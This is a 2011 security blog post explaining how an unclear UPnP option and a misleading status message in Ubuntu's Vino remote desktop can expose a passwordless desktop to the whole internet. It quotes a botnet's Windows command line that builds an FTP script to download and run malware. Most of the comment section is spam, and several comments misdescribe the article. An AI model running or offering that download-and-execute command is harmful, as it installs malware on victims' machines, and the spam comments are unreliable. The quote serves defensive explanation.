Saturday 12 November 2011

Accidentally opening the doors on Ubuntu

This post highlights how even a small modification to a graphical user interface can be responsible for causing unintended security problems.

When Ubuntu's remote desktop service (Vino) first introduced support for UPnP, this is what the Security section of new configuration dialog looked like:

The UPnP feature was activated by checking "Talk to the router and try to open the doors there". Although this label was criticised for sounding too informal, it did actually give a reasonable impression of what might happen if you checked the box. Namely, it used UPnP to configure the router such that the remote desktop service could be accessed from the internet.

However, this is what the option now looks like in the current Long Term Support version of Ubuntu (10.04.3 LTS, Lucid Lynx):

(This is a screenshot from a real victim of the problem I am about to describe)

Notice that this unfortunate user has enabled remote control of their desktop, with no password protection. What was possibly going through their mind?  Well, convenience, most likely. Indeed, the lack of password may not necessarily pose any security problems if the Ubuntu desktop is on a trusted network and not connected directly to the internet. This would be typical of many home networks, where internet access is usually provided by a NAT-enabled router.

But also notice that the UPnP option is now labelled "Configure network automatically to accept connections". The user has checked this box - after all, why wouldn't you want a connection to be accepted automatically? Convenience is the goal here, and there is nothing to suggest that this option really means "accept connections from the entire internet".

So, after checking the box, the user's UPnP-enabled router will start to accept connections from the internet on port 5900 and forward them to the Ubuntu desktop.  Even so, the settings dialog reassuringly and erroneously states that "Your desktop is only reachable over the local network." The combination of this bug and the slightly unclear option label has caused the user to accidentally open the doors on their Ubuntu desktop. To anyone.

Anybody in the world can now use this person's computer simply by using a VNC client to connect to the public-facing IP address of the router (no password required, of course).

Internet-facing VNC servers are often subjected to automated attacks from botnets, but vino-server's lack of connection logging might make these hard to trace after the event. Thankfully, most of the automated attacks happening right now are only designed to exploit Windows systems.  You may, for example, notice attacks similar to the following, which launch a command prompt and create a temporary FTP script named "ik", which is then used to download and execute malware:
cmd /c echo open 21 >> ik &echo user xyz letmein >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
echo You got owned

The botnet simply connects to an exposed VNC server and sends these characters to the remote Windows computer.  Quite cheeky, but at least it has the decency to tell the user they got owned!

Are you affected by this? If you have enabled remote desktop or vino-server on any version of Ubuntu or Windows, you should probably double check that you haven't inadvertently exposed the service to the entire internet. If you do wish for the service to be internet visible, ensure that you use a suitably strong password and keep your server software up to date.


  1. That's why, if you fall into this category, you'll need someone to keep an eye on your kids wherever they are. The person you choose to take care of your children should be trustworthy and services in London We've heard of cases where caretakers liaise with kidnappers to abduct children. You don't want to fall victim to such a racket. UK Close Protection Services are specialists in child protection. When you hire us, we'll provide you with armed and unarmed bodyguards to protect your family against any harm or kidnap.

  2. "Can I simply just say what a relief to find a person that genuinely understands what they are talking about on the internet.
    You definitely know how to bring an issue to light and make it important.
    A lot more people ought to check this out and understand
    this side of your story. It's surprising you are not more popular because you definitely have the gift."


  3. It’s remarkable to go to see this web site and reading the views of all mates about this paragraph, while I am also eager of getting know-how.


  4. I’m impressed, I must say. I’m here for the first time. Superb! I simply must tell you that I really love your blogs page. My boyfriend enjoys your blogs.

  5. This comment has been removed by the author.

  6. Very informative Blog! There is so much information here that can help thank you for sharing.
    Data Science Training in Lucknow

  7. 스포츠토토티비

    This is a lovely post. I really appreciate your optimism and I agree with your post and looking forward for more post from you..

  8. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work thank you.
    Business Analytics Course in Chandigarh

  9. Give the privilege of being a member until it makes people who are interested are widespread and come to apply for membership on the web without interruption. Don't hesitate to apply for membership today. Million dollar slots are waiting for you. Ak88king

  10. Hit on a Soft 17 - A lot of players make this mistake because of|as a end result of} the general rule is to Stand on Hard 17. However on a Soft 17 , the Ace makes all of the difference. When you 우리계열 imagine that your whole will beat the dealer's whole. "Change please" - This is a method of asking the dealer to transform your cash into taking part in} chips.

  11. Rely on the Best Local SEO services in India by Divine Soft Technology and get stay on the top of the search results. Ours is an SEO company in Delhi that works to get you prominence online.

  12. Thanks for bringing alert to readers especially ubuntu users. Small changes will make much difference coding related OS such as Ubuntu. It's really nice to bring this beautiful article for us. Thanks for sharing and keep sharing more related blogs. Traffic Lawyer Alleghany Virginia

  13. Thanks for sharing this wonderful blog. Best CRM Software for Marketing in 2023

  14. I always looking for a blog that is related to my problem and then I found this. Fence Company Spring Hill, FL

  15. are you the same guy who wrote IRC Hacks? it's my favourite book for bedtime reading <3

  16. Wow Excellent post ! an amazing article, I'd like to draft like this too-taking a time and real hardwork to make a great article, Its very easy for me to know about the topic and the undersand to content that resonates with them, Thanks for sharing your insights...
    how long does an uncontested divorce take in virginia
    Abogado De Divorcio En Virginia

  17. I am genuinely thankful for the priceless insights you've shared in this blog post. Your thoughtful analysis and creative concepts have truly deepened my grasp of the topic. I wholeheartedly commend you for the dedication you've shown in crafting this enlightening article. I'm eagerly anticipating the wealth of knowledge I'll gain from your future posts.
    Driving Suspended License Misdemeanor New Jersey

  18. Accidentally opening doors on Ubuntu can be a frustrating experience for users unfamiliar with the operating system's intricacies. Ubuntu's interface, designed for efficiency and simplicity, can sometimes lead to unintended actions due to its sensitivity to various input methods. Users might inadvertently click or tap on icons, leading to applications or folders opening unexpectedly.
    How fast can you get a Divorce in New York
    High Net Worth Divorce Attorney in New York

  19. ley de divorcio nueva jersey
    The article "Accidentally opening the doors on Ubuntu" is a humorous and relatable exploration of unexpected tech challenges faced by users. It blends technical content with humor, making it an engaging and enjoyable read for Ubuntu users and tech enthusiasts. The article provides a witty perspective on the common tech hiccup, communicating frustration in a humorous way. It is a delightful read that combines technical details with humor, navigating unexpected challenges users might face. The article is a clever and entertaining piece, turning a common tech issue into a humorous narrative, making it a recommended read for those who appreciate a lighthearted take on technology mishaps.

  20. You've done an incredible job with this website. I'll recommend it to my friends; they'll benefit from it for sure. Siding Installation Services Richmond, BC

  21. truck accident lawyers
    The text provides a comprehensive guide on how users may accidentally open doors on Ubuntu. It includes a step-by-step guide on how to avoid such issues, along with visual aids like screenshots or video demonstrations. The guide also includes troubleshooting tips for users who encounter difficulties implementing suggested solutions. It also suggests preventive measures, such as user education or additional security measures, to minimize the likelihood of accidental door openings in the future. The guide encourages community engagement by inviting users to share their experiences and tips related to accidental door openings. A feedback loop is established to continuously refine and enhance the content. Finally, the guide provides links to additional resources or support channels for users to seek assistance.

  22. Chiropractic credit card processing not only entices fresh patients but also enhances the overall patient experience. By enabling the acceptance of card payments, chiropractors can simplify the check-in and check-out procedure, minimizing wait times and administrative difficulties. This effectiveness resonates positively with patients.

    By utilizing advanced payment technology, chiropractors can accept payments through various channels, including in-person transactions, online payments, and even mobile payments. This flexibility allows chiropractic clinics to cater to the preferences of their patients and offer a convenient payment option that suits their needs.

  23. The Decapinator offers excellent value for money, resulting in substantial time and cost savings for frequent users. Overall, the Decapinator is a reliable and efficient decapping solution for both hobbyists and professionals.
    truck accident attorney near me A licensed professional, a lawyer advises and represents clients in a variety of legal matters, including criminal, family, personal injury, and business law. By educating people about their legal rights and options, representing them in court, settling disputes, preparing legal documents, conducting research, and standing up for their clients' interests, they play a critical role in society.